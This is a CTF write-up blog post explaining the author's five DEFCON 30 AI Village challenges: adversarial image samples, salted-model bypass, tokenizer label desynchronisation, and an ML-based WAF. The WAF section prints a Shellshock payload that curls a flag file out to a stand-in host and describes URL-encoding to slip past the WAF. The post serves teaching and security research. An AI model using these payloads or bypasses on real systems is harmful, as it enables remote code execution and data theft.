0-Days and Tokens and Salts, Oh My! (An overview of my DEFCON AIV CTF Challenges)

12 min readSep 19, 2022


I wrote 5 CTF challenges for the Defcon 30 AI Village Capture The Flag, I thought I would write a blog post to talk about the solutions and inner workings of the challenges, especially WAF and Token, as these were radically different techniques to the majority of the CTF and seemed to take a lot of the community by surprise. Part of which was definitely due to these challenges having the source code hidden.


For Defcon 30, the AI Village organized an AI Capture The Flag competition hosted on Kaggle. The goals of a CTF are usually to hack/break a system to uncover a hidden flag somewhere within the system. For the AI CTF, the goals were generally less focused on vulnerabilities and more on adversarial samples and model poisoning. The competition ran between the 12th of August and the 12th of September 2022. It ended up with 3,555 individuals joining the competition, with 668 participants making a submission. Kaggle also put up $25,000 in prizes which was incredible.


I’m JankhJankh, I’m a Penetration Tester from Aus where I specialize in red teaming and infrastructure level web attacks. AI hacking research has been my hobby for a few years now, I’ve given a talk and ran a workshop on pentesting ML with a goal of helping to build maturity

My ML background comes from my engineering degree, where I did my honours in developing Multimodal Neural Networks for textile identification to automate clothing recycling.

My Challenges

I provided the the following challenges for the DEFCON 30 AI Village CTF:

  • Forensics
  • Theft
  • Salt
  • WAF
  • Token

These challenges were part of a workshop I ran in Australia earlier in the year. This workshop was white-box, with each user being provided all source code for the challenges other than flags and major spoilers.

The entire workshop is now available online if you would like to try the remaining 10 or so challenges. Which I highly reccomend as they contain a number of challenges that were difficult to make multi-player, such as dataset poisoning and code execution challenges.


PS, I wrote a lot of these challenges in the early days of covid, so a lot of libraries are out of date. Luckily the docker container in the repository will handle that all for you.


While you can do this by just running strings on the file and grepping for a flag, the goal was to give intro level people a flag for just loading a model and looking at what it has inside it.

Veiewing the config for a Keras Model

import tensorflow as tf
model = tf.keras.models.load_model(‘./forensics.h5’)


This challenge was initially built as a web app so users have to retrieve the encrypted model and then decrypt the model to retrieve the pickle file from within it (It’s AES-CBC with a password in rockyou). The server also returns confidences so you can just do an online attack rather than an offline attack if you want to circumvent the decryption stage.

Once you have the model, the sample exploit code provided (https://tcode2k16.github.io/blog/posts/picoctf-2018-writeup/general-skills/#solution-20) gets you 90% of the way there, just change the class names and class IDs.

#Changed lines of code changed from the starting code are:

TURTLE_STR = “loggerhead”
if __name__ == “__main__”:
create_img(“./owl.jpg”, “./owl_turtle.png”, “./model.h5”, TURTLE_STR, TURTLE_IDX)
assert is_similar_img(“./owl.jpg”, “./owl_turtle.png”)

The full solution code can be found here:

Executing this script will slighly modify the image, as seen below.

Unmodified image on the left and the adversarial sample on the right
Submitting the modified image


The secret sauce on SALT is that the randomness added to each image is reasonably small, just big enough to break most solutions to Theft. By cranking up the randomness you can make your changes outperform the random changes the application makes.

#Changed lines of code changed from the starting code are the same as theft except the line in bold which has been changed from -10, 10 to -1, 1

OWL_IDX = 24
OWL_STR = “great_grey_owl”

while cost < 0.99:
cost, gradients = grab_cost_and_gradients_from_model([hacked_image, 0])
hacked_image += np.sign(gradients) * learning_rate
hacked_image = np.clip(hacked_image, max_change_below,max_change_above)
hacked_image = np.clip(hacked_image, -10.0, 10.0)
print(“Model’s predicted likelihood that the image is a “+target_str+”: {:.8}%”.format(cost * 100))

hacked_image = hacked_image.reshape((224,224,3))
img = array_to_img(hacked_image)

if __name__ == “__main__”:
create_img(“./turtle.jpg”, “./turtle_owl.png”, “./model.h5”, OWL_STR, OWL_IDX)
assert is_similar_img(“./turtle.jpg”, “./turtle_owl.png”)

Executing this script will slighly modify the image, as seen below.

Unmodified image on the left and adversarial sample on the right
Submitting the modified image

You can also beat this by doing any kind of adversarial technique that is stronger than the salt used to prevent adversarial attacks, as a whole it’s pretty tough to balance model accuracy and any kind of salting defence.


Combining the solutions to Theft and Salt leaves you with one of my all time favourite tables:

If you liked these two challenges, the workshop has 4 more of these challenges, two about extracting the models and two with different salting techniques to bypass.


Token was originally designed to be an white-box CTF challenge, with participants being given the source code. This challenge is based off of a bug I found in another challenge of mine while making it.

The solution requires no brute force, however if you haven’t messed around with Tokenizers, a little targeted brute forcing could help. To anyone who decided to brute force all ~3 million combinations to get the solution, I hope you will find the real solution enlightening. Also you probably owe Joe and Moo a drink for all the times you overloaded that host.

The goal of this challenge is simple. A server uses a sentiment analysis model to classify the word SECRETKEY. This model has been trained on a wordlist which you are provided, and you can tell the server to remove two lines from this wordlist before the model uses it to classify the word SECRETKEY.

Before we discuss this challenge, it is important to discuss what a tokenizer is, both categorically, and the specific python implementation. Every classification model has a step somewhere in its implementation, where a labeling function is used to replace class ID with the human understandable version. For example, CIFAR 10 has 10 classes, each with an ID between 0–9 (or 1–10 if you are cursed to still use MATLAB). At some point, Class 0 must be converted to the word “airplane” such that humans can interpret the results of classification. This step is absolutely vital to the process, as swapping classes 0 and 1 will lead to consistently poisoned results between the two classes. Additionally, this step often takes place outside the model itself, and lacks the scrutiny the remainder of the model receives.

This labeling process changes drastically from implementation to implementation. The tokenizer is the python text labeling function that takes a dataset and returns a dictionary of every word used in the dataset with a corresponding class ID.

As you can probably tell from my heavily handed infodump, the goal is to swap the label of SECRETKEY with something else. But how is this possible? Tokenizers return consistent results when used, such that if two people use a tokenizer on the same dataset, the words will be labeled in the same order, we can have a look at this by viewing the tokenizer for the provided CSV.

Observing the tokenizer created from the CSV dataset

As you can see, secretkey is at class 4, meaning we would likely need to swap it with class 3 or class 5. By either reading the documentation, or having a look in the CSV, you can identify that these classes are chosen by the frequency of the word appearing in the dataset. With “the” appearing 408 times, “I” appearing 320 times, “blank appearing 220 times, “secretkey” appearing 216 times, and “and” appearing 195 times. As the number of occurrences of “blank” and “secretkey” are only 4 apart, if you could remove 4 occurrences of the word BLANK, both would have 216 occurrences, the only two rows in the dataset that this occurs for are 337 and 493. Deleting these two rows and running the tokenizer again we can see that the labels for “blank” and “secretkey” have swapped. As both words have the same frequency, the first word encountered is given precedence*.

*To the best of my knowledge, I struggled to find documentation on this exact feature.

Row 337 containing the word blank twice
Row 493 containing the word blank twice
Deleting these two rows from the CSV and reusing the tokenizer shows that the labels for secretkey and blank have been swapped

However, submitting numbers 337 and 493 are unsuccessful. This is due to the CSV having a header row.

Submitting lines 493 and 337 to the server is unsuccessful
Viewing the CSV in a text editor

As this CSV has a header row, these values are both off by one, leading to the final two CSV indexes of 336 and 492 to get the flag.

Submitting lines 492 and 336 succesfully returns the flag

These two numbers should be the only numbers that can synchronize the label successfully.

In case anyone was wondering if the server just looks for these numbers, I can assure you the server is actually doing these calculations everytime. You can download a copy of the challenge from the workshop and try it for yourself if you would like to see the magic in action.

When first discovered, I described this vulnerability as a Tokenizer Desynchronisation, and most people seem to be happy with that vulnerability description, however, it can be applied to other labeling layers and processes, whether they are internal to the model or not. So a more appropriate name may be Label Desynchronisation. If you know of any stories or vulnerabilities where the labeling function itself was targeted, please send me a message as I am aiming to collect a list of real-world vulnerabilities against this under-scrutinized pillar of the classification model ecosystem.


As discussed in the challenge, a model has been trained to identify an 0-Day vulnerability. The goal of the challenge was to identify the payload the Web Application Firewall(WAF) is built to block, and then bypass this WAF.

On the backend I used a very simple sentiment analysis model with the malicious payload inside it, such that it will block the request if a known malicious portion is visible.

We provided a sample base 64 encoded malicious request to get people started:


As many people throughout the CTF raised, this starting payload looks like nonsense.

Base64 decoding the starting payload

However, this was actually meant as a way to guide the tester towards the correct solution. By prepending any base-64 character to the start of this string, you will get something far more legible.

amFzaC== -> jash
gmFzaC== -> .ash

If testers were familiar with “bash” this might lead them to attempt “YmFzaA==” which is also blocked by the WAF. Whereas any other character would not be blocked (As the model is only trained to block one specific payload).

Base64 Encoding bash to retreive a payload to test
Submitting the new payload that is also blocked

Note, if players lacked this intuition to try the word bash. This conclusion can also be arrived at by trying various modifications of the starting string. As the hint provided tells players that strings are assessed in blocks of 5, you can make any change to this starting string and it will no longer be blocked by the WAF.

Safe request by prepending any character other than “Y”

Once a player has identified that they can view malicious/non-malicious strings, they can then submit payloads of 4 known malicious characters and one test character. As the model tests strings in sets of 5, the entire base-64 keyspace can be tested in a single request.

Code to try every character prepended to the known bad string

As the model will stop upon the first occurrence of a malicious string, you can pull out the final result and that will be the malicious character:

Confidences returned by the server, noting YmFza is the only sample to have a different confidence

As we now have a technique for identifying the malicious characters one at a time, we can loop this request until we no longer find a malicious character:

Looping this previous code 30 times and adding any newly found bad chars to the list
Code execution output

This slowly builds out the final payload:


This payload does not work out of the box, as you can see, the base64 parameter is the only part of the string that the model was trained on. If you submit this entire string, the server will not be able to base64 decode it. And if you submit the base64 encoded string as is, the WAF will block it, as it is trained to do that.

The payload in question is Shellshock, a classic payload from back in the day.

Decoding the full payload to reveal shellshock

To avoid mucking around with RCE and risk players DOSsing each other, deleting the flag, and other such nonsense, I decided instead to give the flag to any player who sent me this shellshock payload. Note, any payload that included this string would also work, I didn’t want to punish people for trying RCE. For example the following payload would also return the flag to the player as it contained the test string.

() { :;}; /bin/bash curl http://evil.internal/+`cat flag.txt`

If anyone would like to try the RCE version of this challenge, it and the rest of my challenges are available at https://github.com/JankhJankh/aictf

As mentioned, the WAF will block the exact payload required for the flag. So the additional step of WAF bypass is required. Like all WAFs, there are a number of ways to bypass this WAF, the most common technique I find success in as a pentester is URL encoding. Simply encoding each character such that a WAF will read a parameter in a different context to the final server. The following strings are functionally equivalent when viewed by a Flask web application, however, the WAF is not trained to block the latter.


URL encoding bypassing the WAF

By URL encoding the entire payload, we can bypass the WAF and get the flag.

URL encoding the final payload
Submitting the encoded paylod to get the flag

To conclude, this challenge aimed to teach penetration testers the logic flows to consider when looking at an AI model, the hacking required is also introductory enough that I think data scientists get most of it with a bit of googling.

If you would like to see a younger version of me theorize this style of attack well before I made my AI CTF, here is a link to my Intro to Penetration Testing ML talk.



The CTF went incredibly smoothly for the first time the AI Village has ever ran one, and a lot of infrastructure was set up that will make future CTFs run a lot smoother.

Thanks for reading. If you have any feedback or want to chat about my challenges. You can find me at:

Special shoutouts to @moo_hax and @josephtlucas for putting in an incredible amount of work getting the CTF up to an incredible standard, and for keeping WAF and Token alive despite the immense amount of brute forcing these challenges copped during the competition.

Shoutouts to the other awesome folks who made challenges for the ctf:


And a final shoutout to Kaggle for hosting the CTF and putting up 25k in prizes.




Professional Pentester and AI unenthusiast.